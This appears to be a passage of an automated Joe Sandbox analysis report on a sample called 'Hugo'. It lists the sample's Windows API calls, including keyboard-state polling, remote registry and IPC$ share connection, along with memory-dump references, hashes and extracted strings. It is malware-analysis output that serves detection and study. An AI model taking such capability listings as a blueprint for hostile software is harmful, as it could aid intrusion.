                                                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00F12152
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                                                              • Opcode ID: 431be6eb364e5379349dac543c8ce1a3f8a90d23b54f6b05adec3d1241b714cf
                                                                                                                                                                                                              • Instruction ID: 974b7d8dbaa284f805236ebce00397ade1bfed3252f1412fc79738c105b4fe4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 431be6eb364e5379349dac543c8ce1a3f8a90d23b54f6b05adec3d1241b714cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D41BF71500644BFDB249F689C88BF93779EB42371F154259FAA29B2E1C7318D92FB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F60D31,00000001,0000138C,00000001,00000000,00000001,?,00F8EEAE,00FE2430), ref: 00F7A091
                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00F60D31,00000001), ref: 00F7A09A
                                                                                                                                                                                                                • Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F60D31,00000001,0000138C,00000001,00000000,00000001,?,00F8EEAE,00FE2430,?), ref: 00F7A0BC
                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00F60D31,00000001), ref: 00F7A0BF
                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F7A1E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                              • API String ID: 747408836-2268648507
                                                                                                                                                                                                              • Opcode ID: 6b6650a32936f7830ba9d1e6ffcef9a86e374a65c9d7a382e1c5b2348a114842
                                                                                                                                                                                                              • Instruction ID: 8ba5aa02a6cd4b144aa6d091804f58511acac2275c84565ca0c6d4c017e74890
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b6650a32936f7830ba9d1e6ffcef9a86e374a65c9d7a382e1c5b2348a114842
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D041527280021DEACB05FBE0DD86DEEB778AF54340F504065F505B6092EB795F49EB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A
                                                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F71093
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F710AF
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F710CB
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F710F5
                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F7111D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F71128
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F7112D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                              • API String ID: 323675364-22481851
                                                                                                                                                                                                              • Opcode ID: 5a916d7de5bc5d49d77cd3d162bf6ee12769bc5995762f2729b4c431990e88c0
                                                                                                                                                                                                              • Instruction ID: f5025bedf6c135f805b536c1799ddd50ca5e4679a21c8e820f3419e647e65fbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a916d7de5bc5d49d77cd3d162bf6ee12769bc5995762f2729b4c431990e88c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A411872C1022DEBCB11EBA4DC95DEEB778FF04750F44802AE905A21A0EB349E49EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FA4AD9
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00FA4AE0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FA4AF3
                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00FA4AFB
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FA4B06
                                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00FA4B10
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00FA4B1A
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00FA4B30
                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00FA4B3C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                              • API String ID: 2559357485-2160076837
                                                                                                                                                                                                              • Opcode ID: 6ada1527545da3ac5c4376c0f6b4ee80a878dd3a039273d27c5e67557aaebdcc
                                                                                                                                                                                                              • Instruction ID: e18db6c7fdc9366dd3abef61678575f0bdb71ba7b65f0b7c907f421b86a9b3d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ada1527545da3ac5c4376c0f6b4ee80a878dd3a039273d27c5e67557aaebdcc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23316CB2500219BBDF119FA4DC08FDA3BA9FF4E364F110211FA16E61A0C775E851EBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00F946B9
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00F946E7
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00F946F1
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F9478A
                                                                                                                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00F9480E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F94932
                                                                                                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F9496B
                                                                                                                                                                                                              • CoGetObject.OLE32(?,00000000,00FB0B64,?), ref: 00F9498A
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00F9499D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F94A21
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F94A35
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 429561992-0
                                                                                                                                                                                                              • Opcode ID: cf1bcb227aa03492acd4acf98b8b9a612acfb26f807db83025d98ca4de310ab4
                                                                                                                                                                                                              • Instruction ID: a895b6d4a01bc28b33f3a3b3d8ad5bf5011043fd2376dfb798457bb06d2c9250
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf1bcb227aa03492acd4acf98b8b9a612acfb26f807db83025d98ca4de310ab4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00C144B1A043059FAB00DF68C884D6BB7E9FF99758F00491DF98A9B250DB30ED06DB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00F88538
                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F885D4
                                                                                                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00F885E8
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00FB0CD4,00000000,00000001,00FD7E8C,?), ref: 00F88634
                                                                                                                                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F886B9
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00F88711
                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00F8879C
                                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F887BF
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00F887C6
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00F8881B
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00F88821
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2762341140-0
                                                                                                                                                                                                              • Opcode ID: 91f8f96b34d1815c3e059eaa7dc7ec1f9f7fc37e714e83f8f845c97e6efe410a
                                                                                                                                                                                                              • Instruction ID: 793cbfe5403ed1158ac9d9331a1660a865d698f8b6a20a793d81000b9e50d68f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91f8f96b34d1815c3e059eaa7dc7ec1f9f7fc37e714e83f8f845c97e6efe410a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0C12A75A00109EFCB14DFA4C884DAEBBF9FF48354B548099E81ADB261DB34ED42DB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F7039F
                                                                                                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00F703F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00F7040A
                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F7042A
                                                                                                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00F7047D
                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F70491
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F704A6
                                                                                                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00F704B3
                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F704BC
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F704CE
                                                                                                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F704D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2706829360-0
                                                                                                                                                                                                              • Opcode ID: 31f494278d2dae77ac859a51427cf9d48a7ba5b4ec9f5a3c0b42e0f8da330962
                                                                                                                                                                                                              • Instruction ID: fac9688bce641151d6b558a46a2be0e33a64ca7a2e0b74729c55fd77f80abcf6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31f494278d2dae77ac859a51427cf9d48a7ba5b4ec9f5a3c0b42e0f8da330962
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77415F75E0021DEFCB10DFA4DC449EEBBB9FF48354F008069EA5AA7261CB34A945DB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00F7A65D
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00F7A6DE
                                                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00F7A6F9
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00F7A713
                                                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00F7A728
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00F7A740
                                                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00F7A752
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00F7A76A
                                                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00F7A77C
                                                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00F7A794
                                                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00F7A7A6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                                                              • Opcode ID: a9a8220b6b8a99733c0588edc55cc1a873a416e2c0ec59462be70023aab14b94
                                                                                                                                                                                                              • Instruction ID: b54585e6d922913e5aff67811922a71c8a3b17c7a2294c345ea3dadbc2d57269
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9a8220b6b8a99733c0588edc55cc1a873a416e2c0ec59462be70023aab14b94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E641D874D047C96DFF39576088043ADBEB06B95324F0AC05FD5CA4A6C2EB9499C4E763
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                              • API String ID: 707087890-567219261
                                                                                                                                                                                                              • Opcode ID: bb338cd13a8d340487784b6f81527649edd1ed86e258e9f42020f95ace5d5c32
                                                                                                                                                                                                              • Instruction ID: a2ba4e8e3103fefbdf623249513b8bc212e6c2a25be111c68908f10f85edf860
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb338cd13a8d340487784b6f81527649edd1ed86e258e9f42020f95ace5d5c32
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8510332E081169BDF14DFACC9419BEB3A5BF25370B62422DE826E7280DB75DD40E790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitialize.OLE32 ref: 00F941D1
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00F941DC
                                                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00FB0B44,?), ref: 00F94236
                                                                                                                                                                                                              • IIDFromString.OLE32(?,?), ref: 00F942A9
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00F94341
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00F94393
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                              • API String ID: 636576611-1287834457
                                                                                                                                                                                                              • Opcode ID: 08f5f1174f9ff38cb36834bb18b9ad173023457323b5cf4a2a878ad214323f9b
                                                                                                                                                                                                              • Instruction ID: c84c2d640a5b3d357d9f424f2b1f7f5e5c5cea121367dafa5b18176bedf2e287
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08f5f1174f9ff38cb36834bb18b9ad173023457323b5cf4a2a878ad214323f9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B61B0716083019FE710DF64C889F6ABBE8BF59714F00090AF9859B291CB74FD46EB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00F88C9C
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F88CAC
                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F88CB8
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F88D55
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88D69
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88D9B
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F88DD1
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88DDA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                                                              • API String ID: 1464919966-438819550
                                                                                                                                                                                                              • Opcode ID: f7cee2fa94c39b0ea550573193c02437fd959f506746eddbaa9613c1fb5173c3
                                                                                                                                                                                                              • Instruction ID: e40ff40caf7b597040fcd0498dbe203d5dc1c2e0354d0220d13886ce73e5ecfa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7cee2fa94c39b0ea550573193c02437fd959f506746eddbaa9613c1fb5173c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 346169B2504305AFCB10EF60C845ADEB7E8FF99320F44482EF98987251DB35E946DB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMenu.USER32 ref: 00FA4715
                                                                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00FA4724
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA47AC
                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 00FA47C0
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00FA47CA
                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA47F7
                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 00FA47FF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
